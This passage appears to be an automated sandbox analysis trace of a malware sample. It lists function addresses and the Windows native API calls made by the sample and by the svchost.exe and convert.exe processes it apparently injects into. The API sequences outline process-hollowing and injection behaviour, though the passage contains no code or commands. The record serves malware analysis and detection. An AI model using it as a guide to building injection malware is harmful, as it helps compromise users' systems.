Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72B80 NtQueryInformationFile, 2_2_02F72B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72EE0 NtQueueApcThread, 2_2_02F72EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72EA0 NtAdjustPrivilegesToken, 2_2_02F72EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72E80 NtReadVirtualMemory, 2_2_02F72E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72E30 NtWriteVirtualMemory, 2_2_02F72E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72FE0 NtCreateFile, 2_2_02F72FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72FB0 NtResumeThread, 2_2_02F72FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72FA0 NtQuerySection, 2_2_02F72FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72F90 NtProtectVirtualMemory, 2_2_02F72F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72F60 NtCreateProcessEx, 2_2_02F72F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72F30 NtCreateSection, 2_2_02F72F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72CF0 NtOpenProcess, 2_2_02F72CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72CC0 NtQueryVirtualMemory, 2_2_02F72CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72CA0 NtQueryInformationToken, 2_2_02F72CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72C60 NtCreateKey, 2_2_02F72C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72C00 NtQueryInformationProcess, 2_2_02F72C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72DD0 NtDelayExecution, 2_2_02F72DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72DB0 NtEnumerateKey, 2_2_02F72DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72D30 NtUnmapViewOfSection, 2_2_02F72D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72D10 NtMapViewOfSection, 2_2_02F72D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72D00 NtSetInformationFile, 2_2_02F72D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F73090 NtSetValueKey, 2_2_02F73090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F73010 NtOpenDirectoryObject, 2_2_02F73010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F739B0 NtGetContextThread, 2_2_02F739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F73D70 NtOpenThread, 2_2_02F73D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F73D10 NtOpenProcessToken, 2_2_02F73D10
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E24340 NtSetContextThread,LdrInitializeThunk, 8_2_02E24340
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E24650 NtSuspendThread,LdrInitializeThunk, 8_2_02E24650
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22AF0 NtWriteFile,LdrInitializeThunk, 8_2_02E22AF0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22AD0 NtReadFile,LdrInitializeThunk, 8_2_02E22AD0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22BE0 NtQueryValueKey,LdrInitializeThunk, 8_2_02E22BE0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_02E22BF0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22BA0 NtEnumerateValueKey,LdrInitializeThunk, 8_2_02E22BA0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22B60 NtClose,LdrInitializeThunk, 8_2_02E22B60
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22EE0 NtQueueApcThread,LdrInitializeThunk, 8_2_02E22EE0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22E80 NtReadVirtualMemory,LdrInitializeThunk, 8_2_02E22E80
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22FE0 NtCreateFile,LdrInitializeThunk, 8_2_02E22FE0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22FB0 NtResumeThread,LdrInitializeThunk, 8_2_02E22FB0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22F30 NtCreateSection,LdrInitializeThunk, 8_2_02E22F30
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_02E22CA0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22C60 NtCreateKey,LdrInitializeThunk, 8_2_02E22C60
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_02E22C70
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_02E22DF0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22DD0 NtDelayExecution,LdrInitializeThunk, 8_2_02E22DD0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22D30 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_02E22D30
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_02E22D10
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E235C0 NtCreateMutant,LdrInitializeThunk, 8_2_02E235C0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E239B0 NtGetContextThread,LdrInitializeThunk, 8_2_02E239B0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22AB0 NtWaitForSingleObject, 8_2_02E22AB0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22B80 NtQueryInformationFile, 8_2_02E22B80
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22EA0 NtAdjustPrivilegesToken, 8_2_02E22EA0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22E30 NtWriteVirtualMemory, 8_2_02E22E30
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22FA0 NtQuerySection, 8_2_02E22FA0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22F90 NtProtectVirtualMemory, 8_2_02E22F90
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22F60 NtCreateProcessEx, 8_2_02E22F60
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22CF0 NtOpenProcess, 8_2_02E22CF0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22CC0 NtQueryVirtualMemory, 8_2_02E22CC0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22C00 NtQueryInformationProcess, 8_2_02E22C00
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22DB0 NtEnumerateKey, 8_2_02E22DB0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E22D00 NtSetInformationFile, 8_2_02E22D00
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E23090 NtSetValueKey, 8_2_02E23090
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E23010 NtOpenDirectoryObject, 8_2_02E23010
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E23D70 NtOpenThread, 8_2_02E23D70
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E23D10 NtOpenProcessToken, 8_2_02E23D10
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_002579F0 NtCreateFile, 8_2_002579F0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00257B50 NtReadFile, 8_2_00257B50
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00257C40 NtDeleteFile, 8_2_00257C40
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00257CE0 NtClose, 8_2_00257CE0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_00257E40 NtAllocateVirtualMemory, 8_2_00257E40
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008740B1: CreateFileW,_memset,DeviceIoControl,CloseHandle, 1_2_008740B1
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00868858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 1_2_00868858
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0087545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 1_2_0087545F
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0081E800 1_2_0081E800
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0083DBB5 1_2_0083DBB5
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0089804A 1_2_0089804A
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0081E060 1_2_0081E060
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00824140 1_2_00824140
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00832405 1_2_00832405
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00846522 1_2_00846522
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00890665 1_2_00890665
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0084267E 1_2_0084267E
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0083283A 1_2_0083283A
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00826843 1_2_00826843
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008489DF 1_2_008489DF
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00846A94 1_2_00846A94
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00890AE2 1_2_00890AE2
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00828A0E 1_2_00828A0E
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0086EB07 1_2_0086EB07
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00878B13 1_2_00878B13
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0083CD61 1_2_0083CD61
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00847006 1_2_00847006
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00823190 1_2_00823190
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0082710E 1_2_0082710E
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00811287 1_2_00811287
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008333C7 1_2_008333C7
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0083F419 1_2_0083F419
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00825680 1_2_00825680
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008316C4 1_2_008316C4
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008258C0 1_2_008258C0
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008378D3 1_2_008378D3
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00831BB8 1_2_00831BB8
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00849D05 1_2_00849D05
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0081FE40 1_2_0081FE40
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00831FD0 1_2_00831FD0
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0083BFE6 1_2_0083BFE6
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_024435D0 1_2_024435D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401000 2_2_00401000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00402820 2_2_00402820
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00410083 2_2_00410083
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E103 2_2_0040E103
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00401190 2_2_00401190
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403300 2_2_00403300
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004025C0 2_2_004025C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040FE63 2_2_0040FE63
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042D693 2_2_0042D693
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041672E 2_2_0041672E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00416733 2_2_00416733
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC02C0 2_2_02FC02C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 2_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030003E6 2_2_030003E6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 2_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFA352 2_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030001AA 2_2_030001AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD2000 2_2_02FD2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF81CC 2_2_02FF81CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF41A2 2_2_02FF41A2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC8158 2_2_02FC8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDA118 2_2_02FDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30100 2_2_02F30100
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5C6E0 2_2_02F5C6E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3C7C0 2_2_02F3C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40770 2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F64750 2_2_02F64750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEE4F6 2_2_02FEE4F6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03000591 2_2_03000591
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF2446 2_2_02FF2446
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE4420 2_2_02FE4420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40535 2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3EA80 2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF6BD7 2_2_02FF6BD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFAB40 2_2_02FFAB40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E8F0 2_2_02F6E8F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F268B8 2_2_02F268B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300A9A6 2_2_0300A9A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4A840 2_2_02F4A840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F42840 2_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F429A0 2_2_02F429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F56962 2_2_02F56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFEEDB 2_2_02FFEEDB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F52E90 2_2_02F52E90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFCE93 2_2_02FFCE93
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40E59 2_2_02F40E59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFEE26 2_2_02FFEE26
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4CFE0 2_2_02F4CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F32FC8 2_2_02F32FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FBEFA0 2_2_02FBEFA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB4F40 2_2_02FB4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F60F30 2_2_02F60F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE2F30 2_2_02FE2F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F82F28 2_2_02F82F28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F30CF2 2_2_02F30CF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0CB5 2_2_02FE0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40C00 2_2_02F40C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3ADE0 2_2_02F3ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F58DBF 2_2_02F58DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDCD1F 2_2_02FDCD1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4AD00 2_2_02F4AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE12ED 2_2_02FE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5B2C0 2_2_02F5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F452A0 2_2_02F452A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F8739A 2_2_02F8739A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2D34C 2_2_02F2D34C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF132D 2_2_02FF132D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF70E9 2_2_02FF70E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFF0E0 2_2_02FFF0E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEF0CC 2_2_02FEF0CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F470C0 2_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300B16B 2_2_0300B16B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4B1B0 2_2_02F4B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2F172 2_2_02F2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7516C 2_2_02F7516C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF16CC 2_2_02FF16CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F85630 2_2_02F85630
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFF7B0 2_2_02FFF7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F31460 2_2_02F31460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFF43F 2_2_02FFF43F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030095C3 2_2_030095C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDD5B0 2_2_02FDD5B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF7571 2_2_02FF7571
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEDAC6 2_2_02FEDAC6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDDAAC 2_2_02FDDAAC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F85AA0 2_2_02F85AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE1AA3 2_2_02FE1AA3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB3A6C 2_2_02FB3A6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFFA49 2_2_02FFFA49
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF7A46 2_2_02FF7A46
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB5BF0 2_2_02FB5BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7DBF9 2_2_02F7DBF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5FB80 2_2_02F5FB80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFFB76 2_2_02FFFB76
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F438E0 2_2_02F438E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAD800 2_2_02FAD800
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F49950 2_2_02F49950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5B950 2_2_02F5B950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD5910 2_2_02FD5910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F49EB0 2_2_02F49EB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F03FD2 2_2_02F03FD2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F03FD5 2_2_02F03FD5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFFFB1 2_2_02FFFFB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F41F92 2_2_02F41F92
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFFF09 2_2_02FFFF09
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFFCF2 2_2_02FFFCF2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB9C32 2_2_02FB9C32
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5FDC0 2_2_02F5FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF7D73 2_2_02FF7D73
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF1D5A 2_2_02FF1D5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F43D40 2_2_02F43D40
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E702C0 8_2_02E702C0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E90274 8_2_02E90274
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EB03E6 8_2_02EB03E6
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DFE3F0 8_2_02DFE3F0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAA352 8_2_02EAA352
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E82000 8_2_02E82000
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EA81CC 8_2_02EA81CC
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EB01AA 8_2_02EB01AA
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EA41A2 8_2_02EA41A2
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E78158 8_2_02E78158
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DE0100 8_2_02DE0100
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E8A118 8_2_02E8A118
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E0C6E0 8_2_02E0C6E0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DEC7C0 8_2_02DEC7C0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF0770 8_2_02DF0770
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E14750 8_2_02E14750
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E9E4F6 8_2_02E9E4F6
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EA2446 8_2_02EA2446
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E94420 8_2_02E94420
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EB0591 8_2_02EB0591
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF0535 8_2_02DF0535
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DEEA80 8_2_02DEEA80
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EA6BD7 8_2_02EA6BD7
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAAB40 8_2_02EAAB40
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E1E8F0 8_2_02E1E8F0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DD68B8 8_2_02DD68B8
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF2840 8_2_02DF2840
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DFA840 8_2_02DFA840
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EBA9A6 8_2_02EBA9A6
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF29A0 8_2_02DF29A0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E06962 8_2_02E06962
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAEEDB 8_2_02EAEEDB
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E02E90 8_2_02E02E90
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EACE93 8_2_02EACE93
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF0E59 8_2_02DF0E59
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAEE26 8_2_02EAEE26
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DE2FC8 8_2_02DE2FC8
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DFCFE0 8_2_02DFCFE0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E6EFA0 8_2_02E6EFA0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E64F40 8_2_02E64F40
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E32F28 8_2_02E32F28
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E10F30 8_2_02E10F30
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E92F30 8_2_02E92F30
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DE0CF2 8_2_02DE0CF2
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E90CB5 8_2_02E90CB5
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF0C00 8_2_02DF0C00
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DEADE0 8_2_02DEADE0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E08DBF 8_2_02E08DBF
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DFAD00 8_2_02DFAD00
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E8CD1F 8_2_02E8CD1F
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E912ED 8_2_02E912ED
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E0B2C0 8_2_02E0B2C0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF52A0 8_2_02DF52A0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E3739A 8_2_02E3739A
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DDD34C 8_2_02DDD34C
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EA132D 8_2_02EA132D
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EA70E9 8_2_02EA70E9
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EAF0E0 8_2_02EAF0E0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DF70C0 8_2_02DF70C0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E9F0CC 8_2_02E9F0CC
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DFB1B0 8_2_02DFB1B0
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02EBB16B 8_2_02EBB16B
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02E2516C 8_2_02E2516C
Source: C:\Windows\SysWOW64\convert.exe Code function: 8_2_02DDF172 8_2_02DDF172
